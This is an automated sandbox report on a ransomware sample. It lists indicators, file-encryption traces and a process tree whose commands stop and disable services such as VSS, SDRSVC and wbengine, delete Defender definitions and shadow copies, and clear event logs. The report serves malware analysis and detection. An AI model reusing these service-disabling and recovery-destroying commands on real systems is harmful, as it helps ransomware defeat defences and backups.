Resubmissions
12-01-2022 20:48
220112-zlnz9adhf2 1012-01-2022 19:37
220112-yb5pksdgc6 1012-01-2022 19:25
220112-x5evksdgdl 1012-01-2022 16:50
220112-vb8jpadcc4 10Analysis
-
max time kernel
11s -
max time network
125s -
platform
windows10_x64 -
resource
win10-en-20211208 -
submitted
12-01-2022 20:48
Static task
static1
Behavioral task
behavioral1
Sample
cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe
Resource
win7-en-20211208
Behavioral task
behavioral2
Sample
cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe
Resource
win10-en-20211208
General
-
Target
cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe
-
Size
2.6MB
-
MD5
47f540350b1d360403225d146cc7fbb8
-
SHA1
43ad25b99cb47c7367b1703315402bb9e4970590
-
SHA256
cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf
-
SHA512
91387685946beb65cddbc62b19102a1135511563bd84f24cacc402a1e5a1afb750887fa9d50e7120acd23ae27af53669a45fc48363c000b7f2ffb777036019ce
Malware Config
Signatures
-
Deletes Windows Defender Definitions 2 TTPs 1 IoCs
Uses mpcmdrun utility to delete all AV definitions.
pid Process 4324 MpCmdRun.exe -
Modifies security service 2 TTPs 1 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "4" reg.exe -
Clears Windows event logs 1 TTPs
-
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
pid Process 4284 bcdedit.exe 4244 bcdedit.exe -
Drops file in Program Files directory 64 IoCs
description ioc Process File opened for modification C:\Program Files\Common Files\System\msadc\es-ES\msdaremr.dll.mui cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe File opened for modification C:\Program Files\Common Files\microsoft shared\ink\pt-BR\tipresx.dll.mui cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe File opened for modification C:\Program Files\Common Files\System\ado\msado21.tlb cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe File opened for modification C:\Program Files\Common Files\System\msadc\es-ES\msadcer.dll.mui cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe File opened for modification C:\Program Files\Common Files\System\msadc\es-ES\msaddsr.dll.mui cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe File opened for modification C:\Program Files\Common Files\System\msadc\ja-JP\msadcer.dll.mui cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe File opened for modification C:\Program Files\Common Files\microsoft shared\ink\ipscsy.xml cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe File opened for modification C:\Program Files\Common Files\microsoft shared\ink\ipsita.xml cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe File opened for modification C:\Program Files\7-Zip\Lang\mn.txt.l5hjfyWc4JvF-9lZj1c3aIXF7spg0PdVWwDSHGE1V8P_6vPOjo3SHM00.8zvpm cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe File opened for modification C:\Program Files\Common Files\System\Ole DB\es-ES\sqloledb.rll.mui.l5hjfyWc4JvF-9lZj1c3aIXF7spg0PdVWwDSHGE1V8P_O3eJ6NAmm9o0.8zvpm cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe File opened for modification C:\Program Files\Common Files\microsoft shared\ink\ja-JP\TabTip.exe.mui cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe File opened for modification C:\Program Files\Common Files\microsoft shared\ink\fr-FR\InputPersonalization.exe.mui cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe File opened for modification C:\Program Files\Common Files\System\Ole DB\de-DE\sqloledb.rll.mui.l5hjfyWc4JvF-9lZj1c3aIXF7spg0PdVWwDSHGE1V8P_fhj5uqEg0i00.8zvpm cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe File opened for modification C:\Program Files\Common Files\System\msadc\adcvbs.inc cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe File opened for modification C:\Program Files\Common Files\System\ado\de-DE\msader15.dll.mui.l5hjfyWc4JvF-9lZj1c3aIXF7spg0PdVWwDSHGE1V8P_BrE7SfGNDFI0.8zvpm cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe File opened for modification C:\Program Files\Common Files\System\msadc\en-US\msadcor.dll.mui cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe File opened for modification C:\Program Files\Common Files\microsoft shared\ink\en-US\boxed-delete.avi cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe File opened for modification C:\Program Files\7-Zip\Lang\pt-br.txt.l5hjfyWc4JvF-9lZj1c3aIXF7spg0PdVWwDSHGE1V8P_konMUSUuISU0.8zvpm cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe File opened for modification C:\Program Files\7-Zip\Lang\pt.txt.l5hjfyWc4JvF-9lZj1c3aIXF7spg0PdVWwDSHGE1V8P_5xFbVdOVa6s0.8zvpm cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe File opened for modification C:\Program Files\Internet Explorer\en-US\hmmapi.dll.mui cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\include\jvmti.h.l5hjfyWc4JvF-9lZj1c3aIXF7spg0PdVWwDSHGE1V8P_eH64ombB-G00.8zvpm cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\lib\jsse.jar.l5hjfyWc4JvF-9lZj1c3aIXF7spg0PdVWwDSHGE1V8P_tbdh9qBrKy80.8zvpm cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe File opened for modification C:\Program Files\7-Zip\Lang\th.txt.l5hjfyWc4JvF-9lZj1c3aIXF7spg0PdVWwDSHGE1V8P_vskVFmk5ASc0.8zvpm cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe File opened for modification C:\Program Files\Common Files\microsoft shared\ink\fr-CA\tipresx.dll.mui cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe File opened for modification C:\Program Files\Common Files\microsoft shared\ink\fsdefinitions\main\base_heb.xml cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe File opened for modification C:\Program Files\Common Files\microsoft shared\ink\fsdefinitions\main\zh-dayi.xml cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\lib\accessibility.properties.l5hjfyWc4JvF-9lZj1c3aIXF7spg0PdVWwDSHGE1V8P_wPYuZEWt2_o0.8zvpm cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe File opened for modification C:\Program Files\7-Zip\Lang\es.txt.l5hjfyWc4JvF-9lZj1c3aIXF7spg0PdVWwDSHGE1V8P_vUSk8e7r4C40.8zvpm cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe File opened for modification C:\Program Files\7-Zip\Lang\uk.txt.l5hjfyWc4JvF-9lZj1c3aIXF7spg0PdVWwDSHGE1V8P_bTJdaUGm-300.8zvpm cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe File opened for modification C:\Program Files\Internet Explorer\SIGNUP\install.ins.l5hjfyWc4JvF-9lZj1c3aIXF7spg0PdVWwDSHGE1V8P_gU8zTUCKuqI0.8zvpm cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe File opened for modification C:\Program Files\Common Files\microsoft shared\ink\ja-JP\InputPersonalization.exe.mui cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe File opened for modification C:\Program Files\Common Files\microsoft shared\ink\fr-FR\InkObj.dll.mui cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe File opened for modification C:\Program Files\Internet Explorer\ja-JP\iexplore.exe.mui.l5hjfyWc4JvF-9lZj1c3aIXF7spg0PdVWwDSHGE1V8P_ck6QE6lo-C00.8zvpm cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\db\lib\derbyLocale_fr.jar.l5hjfyWc4JvF-9lZj1c3aIXF7spg0PdVWwDSHGE1V8P_iVlGHb6cGpo0.8zvpm cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\db\lib\derbyLocale_zh_TW.jar.l5hjfyWc4JvF-9lZj1c3aIXF7spg0PdVWwDSHGE1V8P_QWDShMEdjZU0.8zvpm cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe File opened for modification C:\Program Files\Common Files\System\ado\msado27.tlb cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe File opened for modification C:\Program Files\Common Files\microsoft shared\ink\bg-BG\tipresx.dll.mui cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe File opened for modification C:\Program Files\Common Files\microsoft shared\ink\sv-SE\tipresx.dll.mui cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe File opened for modification C:\Program Files\Internet Explorer\en-US\ieinstal.exe.mui cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe File opened for modification C:\Program Files\7-Zip\Lang\br.txt.l5hjfyWc4JvF-9lZj1c3aIXF7spg0PdVWwDSHGE1V8P_pVf4RmBDuKk0.8zvpm cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe File opened for modification C:\Program Files\7-Zip\Lang\mng.txt.l5hjfyWc4JvF-9lZj1c3aIXF7spg0PdVWwDSHGE1V8P_DpoBaSyQiKU0.8zvpm cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\lib\images\cursors\invalid32x32.gif.l5hjfyWc4JvF-9lZj1c3aIXF7spg0PdVWwDSHGE1V8P_GLFVhr7viu00.8zvpm cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe File opened for modification C:\Program Files\7-Zip\Lang\ba.txt.l5hjfyWc4JvF-9lZj1c3aIXF7spg0PdVWwDSHGE1V8P_ks8n0Ea6w0g0.8zvpm cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe File opened for modification C:\Program Files\Common Files\microsoft shared\ink\fsdefinitions\main\ko-kr.xml cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe File opened for modification C:\Program Files\Common Files\microsoft shared\ink\en-US\InkObj.dll.mui cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe File opened for modification C:\Program Files\Common Files\microsoft shared\ink\uk-UA\tipresx.dll.mui cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe File opened for modification C:\Program Files\Common Files\System\Ole DB\de-DE\sqlxmlx.rll.mui cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe File opened for modification C:\Program Files\Common Files\System\msadc\ja-JP\msadcor.dll.mui.l5hjfyWc4JvF-9lZj1c3aIXF7spg0PdVWwDSHGE1V8P_1WYGLGA5Lak0.8zvpm cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe File opened for modification C:\Program Files\Common Files\microsoft shared\ink\ipsjpn.xml cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\db\bin\startNetworkServer.l5hjfyWc4JvF-9lZj1c3aIXF7spg0PdVWwDSHGE1V8P_D1SnkZTNpOM0.8zvpm cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\LICENSE.l5hjfyWc4JvF-9lZj1c3aIXF7spg0PdVWwDSHGE1V8P_dONKzwoUmCs0.8zvpm cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe File opened for modification C:\Program Files\Common Files\microsoft shared\MSInfo\de-DE\msinfo32.exe.mui cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe File opened for modification C:\Program Files\Common Files\microsoft shared\MSInfo\es-ES\msinfo32.exe.mui.l5hjfyWc4JvF-9lZj1c3aIXF7spg0PdVWwDSHGE1V8P_sL2bo9ccq700.8zvpm cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe File opened for modification C:\Program Files\Common Files\microsoft shared\ink\en-US\mshwLatin.dll.mui cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe File opened for modification C:\Program Files\Common Files\Services\verisign.bmp cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe File opened for modification C:\Program Files\Common Files\System\msadc\es-ES\msadcor.dll.mui cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe File opened for modification C:\Program Files\Common Files\microsoft shared\ink\en-US\split.avi cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe File opened for modification C:\Program Files\7-Zip\Lang\lt.txt.l5hjfyWc4JvF-9lZj1c3aIXF7spg0PdVWwDSHGE1V8P_Y0SKeAHLr180.8zvpm cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe File opened for modification C:\Program Files\Common Files\System\ado\en-US\msader15.dll.mui cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe File opened for modification C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVClient.man.l5hjfyWc4JvF-9lZj1c3aIXF7spg0PdVWwDSHGE1V8P_04G4rkwkJEo0.8zvpm cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\db\bin\setNetworkClientCP.l5hjfyWc4JvF-9lZj1c3aIXF7spg0PdVWwDSHGE1V8P_3-96XcqWjgE0.8zvpm cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe File opened for modification C:\Program Files\7-Zip\Lang\hu.txt.l5hjfyWc4JvF-9lZj1c3aIXF7spg0PdVWwDSHGE1V8P_N8RZdaiY1Bk0.8zvpm cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe File opened for modification C:\Program Files\Common Files\System\Ole DB\es-ES\sqlxmlx.rll.mui.l5hjfyWc4JvF-9lZj1c3aIXF7spg0PdVWwDSHGE1V8P_V4hsctsr0680.8zvpm cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe File opened for modification C:\Program Files\Common Files\System\msadc\es-ES\msadcor.dll.mui.l5hjfyWc4JvF-9lZj1c3aIXF7spg0PdVWwDSHGE1V8P_bkgIS9F5Y_A0.8zvpm cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe -
Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
-
Interacts with shadow copies 2 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 3772 vssadmin.exe -
Modifies registry class 3 IoCs
description ioc Process Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\EPP reg.exe Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shellex\ContextMenuHandlers\EPP reg.exe Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\Drive\shellex\ContextMenuHandlers\EPP reg.exe -
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 8 IoCs
pid Process 3040 powershell.exe 3040 powershell.exe 3040 powershell.exe 1780 powershell.exe 1780 powershell.exe 1780 powershell.exe 1480 cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe 1480 cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeSecurityPrivilege 2176 wevtutil.exe Token: SeBackupPrivilege 2176 wevtutil.exe Token: SeSecurityPrivilege 4036 wevtutil.exe Token: SeBackupPrivilege 4036 wevtutil.exe Token: SeSecurityPrivilege 4100 wevtutil.exe Token: SeBackupPrivilege 4100 wevtutil.exe Token: SeIncreaseQuotaPrivilege 4136 wmic.exe Token: SeSecurityPrivilege 4136 wmic.exe Token: SeTakeOwnershipPrivilege 4136 wmic.exe Token: SeLoadDriverPrivilege 4136 wmic.exe Token: SeSystemProfilePrivilege 4136 wmic.exe Token: SeSystemtimePrivilege 4136 wmic.exe Token: SeProfSingleProcessPrivilege 4136 wmic.exe Token: SeIncBasePriorityPrivilege 4136 wmic.exe Token: SeCreatePagefilePrivilege 4136 wmic.exe Token: SeBackupPrivilege 4136 wmic.exe Token: SeRestorePrivilege 4136 wmic.exe Token: SeShutdownPrivilege 4136 wmic.exe Token: SeDebugPrivilege 4136 wmic.exe Token: SeSystemEnvironmentPrivilege 4136 wmic.exe Token: SeRemoteShutdownPrivilege 4136 wmic.exe Token: SeUndockPrivilege 4136 wmic.exe Token: SeManageVolumePrivilege 4136 wmic.exe Token: 33 4136 wmic.exe Token: 34 4136 wmic.exe Token: 35 4136 wmic.exe Token: 36 4136 wmic.exe Token: SeIncreaseQuotaPrivilege 3184 wmic.exe Token: SeSecurityPrivilege 3184 wmic.exe Token: SeTakeOwnershipPrivilege 3184 wmic.exe Token: SeLoadDriverPrivilege 3184 wmic.exe Token: SeSystemProfilePrivilege 3184 wmic.exe Token: SeSystemtimePrivilege 3184 wmic.exe Token: SeProfSingleProcessPrivilege 3184 wmic.exe Token: SeIncBasePriorityPrivilege 3184 wmic.exe Token: SeCreatePagefilePrivilege 3184 wmic.exe Token: SeBackupPrivilege 3184 wmic.exe Token: SeRestorePrivilege 3184 wmic.exe Token: SeShutdownPrivilege 3184 wmic.exe Token: SeDebugPrivilege 3184 wmic.exe Token: SeSystemEnvironmentPrivilege 3184 wmic.exe Token: SeRemoteShutdownPrivilege 3184 wmic.exe Token: SeUndockPrivilege 3184 wmic.exe Token: SeManageVolumePrivilege 3184 wmic.exe Token: 33 3184 wmic.exe Token: 34 3184 wmic.exe Token: 35 3184 wmic.exe Token: 36 3184 wmic.exe Token: SeIncreaseQuotaPrivilege 3184 wmic.exe Token: SeSecurityPrivilege 3184 wmic.exe Token: SeTakeOwnershipPrivilege 3184 wmic.exe Token: SeLoadDriverPrivilege 3184 wmic.exe Token: SeSystemProfilePrivilege 3184 wmic.exe Token: SeSystemtimePrivilege 3184 wmic.exe Token: SeProfSingleProcessPrivilege 3184 wmic.exe Token: SeIncBasePriorityPrivilege 3184 wmic.exe Token: SeCreatePagefilePrivilege 3184 wmic.exe Token: SeBackupPrivilege 3184 wmic.exe Token: SeRestorePrivilege 3184 wmic.exe Token: SeShutdownPrivilege 3184 wmic.exe Token: SeDebugPrivilege 3184 wmic.exe Token: SeSystemEnvironmentPrivilege 3184 wmic.exe Token: SeRemoteShutdownPrivilege 3184 wmic.exe Token: SeUndockPrivilege 3184 wmic.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1480 wrote to memory of 3812 1480 cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe 68 PID 1480 wrote to memory of 3812 1480 cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe 68 PID 3812 wrote to memory of 3708 3812 net.exe 70 PID 3812 wrote to memory of 3708 3812 net.exe 70 PID 1480 wrote to memory of 4128 1480 cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe 71 PID 1480 wrote to memory of 4128 1480 cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe 71 PID 4128 wrote to memory of 3036 4128 net.exe 73 PID 4128 wrote to memory of 3036 4128 net.exe 73 PID 1480 wrote to memory of 692 1480 cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe 74 PID 1480 wrote to memory of 692 1480 cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe 74 PID 692 wrote to memory of 3500 692 net.exe 76 PID 692 wrote to memory of 3500 692 net.exe 76 PID 1480 wrote to memory of 4072 1480 cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe 77 PID 1480 wrote to memory of 4072 1480 cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe 77 PID 4072 wrote to memory of 8 4072 net.exe 79 PID 4072 wrote to memory of 8 4072 net.exe 79 PID 1480 wrote to memory of 4276 1480 cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe 80 PID 1480 wrote to memory of 4276 1480 cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe 80 PID 4276 wrote to memory of 4228 4276 net.exe 82 PID 4276 wrote to memory of 4228 4276 net.exe 82 PID 1480 wrote to memory of 4216 1480 cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe 83 PID 1480 wrote to memory of 4216 1480 cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe 83 PID 4216 wrote to memory of 4356 4216 net.exe 85 PID 4216 wrote to memory of 4356 4216 net.exe 85 PID 1480 wrote to memory of 4416 1480 cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe 86 PID 1480 wrote to memory of 4416 1480 cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe 86 PID 4416 wrote to memory of 4316 4416 net.exe 88 PID 4416 wrote to memory of 4316 4416 net.exe 88 PID 1480 wrote to memory of 4300 1480 cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe 89 PID 1480 wrote to memory of 4300 1480 cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe 89 PID 4300 wrote to memory of 3324 4300 net.exe 91 PID 4300 wrote to memory of 3324 4300 net.exe 91 PID 1480 wrote to memory of 3888 1480 cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe 92 PID 1480 wrote to memory of 3888 1480 cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe 92 PID 3888 wrote to memory of 3656 3888 net.exe 94 PID 3888 wrote to memory of 3656 3888 net.exe 94 PID 1480 wrote to memory of 3192 1480 cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe 95 PID 1480 wrote to memory of 3192 1480 cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe 95 PID 1480 wrote to memory of 524 1480 cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe 97 PID 1480 wrote to memory of 524 1480 cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe 97 PID 1480 wrote to memory of 644 1480 cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe 99 PID 1480 wrote to memory of 644 1480 cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe 99 PID 1480 wrote to memory of 908 1480 cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe 101 PID 1480 wrote to memory of 908 1480 cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe 101 PID 1480 wrote to memory of 1068 1480 cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe 103 PID 1480 wrote to memory of 1068 1480 cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe 103 PID 1480 wrote to memory of 1228 1480 cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe 105 PID 1480 wrote to memory of 1228 1480 cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe 105 PID 1480 wrote to memory of 1448 1480 cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe 107 PID 1480 wrote to memory of 1448 1480 cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe 107 PID 1480 wrote to memory of 1632 1480 cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe 109 PID 1480 wrote to memory of 1632 1480 cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe 109 PID 1480 wrote to memory of 1896 1480 cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe 111 PID 1480 wrote to memory of 1896 1480 cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe 111 PID 1480 wrote to memory of 1808 1480 cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe 113 PID 1480 wrote to memory of 1808 1480 cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe 113 PID 1480 wrote to memory of 2340 1480 cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe 115 PID 1480 wrote to memory of 2340 1480 cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe 115 PID 1480 wrote to memory of 2576 1480 cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe 117 PID 1480 wrote to memory of 2576 1480 cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe 117 PID 1480 wrote to memory of 3256 1480 cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe 119 PID 1480 wrote to memory of 3256 1480 cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe 119 PID 1480 wrote to memory of 3088 1480 cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe 121 PID 1480 wrote to memory of 3088 1480 cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe 121
Processes
-
C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe"C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe"1⤵
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1480 -
C:\Windows\SYSTEM32\net.exenet.exe stop "SamSs" /y2⤵
- Suspicious use of WriteProcessMemory
PID:3812 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SamSs" /y3⤵PID:3708
-
-
-
C:\Windows\SYSTEM32\net.exenet.exe stop "SDRSVC" /y2⤵
- Suspicious use of WriteProcessMemory
PID:4128 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SDRSVC" /y3⤵PID:3036
-
-
-
C:\Windows\SYSTEM32\net.exenet.exe stop "SstpSvc" /y2⤵
- Suspicious use of WriteProcessMemory
PID:692 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SstpSvc" /y3⤵PID:3500
-
-
-
C:\Windows\SYSTEM32\net.exenet.exe stop "UI0Detect" /y2⤵
- Suspicious use of WriteProcessMemory
PID:4072 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "UI0Detect" /y3⤵PID:8
-
-
-
C:\Windows\SYSTEM32\net.exenet.exe stop "vmicvss" /y2⤵
- Suspicious use of WriteProcessMemory
PID:4276 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "vmicvss" /y3⤵PID:4228
-
-
-
C:\Windows\SYSTEM32\net.exenet.exe stop "VSS" /y2⤵
- Suspicious use of WriteProcessMemory
PID:4216 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "VSS" /y3⤵PID:4356
-
-
-
C:\Windows\SYSTEM32\net.exenet.exe stop "wbengine" /y2⤵
- Suspicious use of WriteProcessMemory
PID:4416 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "wbengine" /y3⤵PID:4316
-
-
-
C:\Windows\SYSTEM32\net.exenet.exe stop "WebClient" /y2⤵
- Suspicious use of WriteProcessMemory
PID:4300 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "WebClient" /y3⤵PID:3324
-
-
-
C:\Windows\SYSTEM32\net.exenet.exe stop "UnistoreSvc_12c39" /y2⤵
- Suspicious use of WriteProcessMemory
PID:3888 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "UnistoreSvc_12c39" /y3⤵PID:3656
-
-
-
C:\Windows\SYSTEM32\sc.exesc.exe config "SamSs" start= disabled2⤵PID:3192
-
-
C:\Windows\SYSTEM32\sc.exesc.exe config "SDRSVC" start= disabled2⤵PID:524
-
-
C:\Windows\SYSTEM32\sc.exesc.exe config "SstpSvc" start= disabled2⤵PID:644
-
-
C:\Windows\SYSTEM32\sc.exesc.exe config "UI0Detect" start= disabled2⤵PID:908
-
-
